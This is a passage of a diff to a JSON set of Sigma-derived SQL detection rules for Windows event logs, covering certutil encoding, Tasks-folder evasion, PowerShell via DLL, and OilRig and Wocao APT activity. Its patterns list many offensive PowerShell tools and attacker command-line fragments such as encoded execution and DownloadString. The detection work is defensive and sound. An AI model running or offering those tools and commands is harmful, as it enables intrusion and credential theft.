('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1027", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - "id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.reconnaissance", "attack.discovery", - "attack.impact" + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian 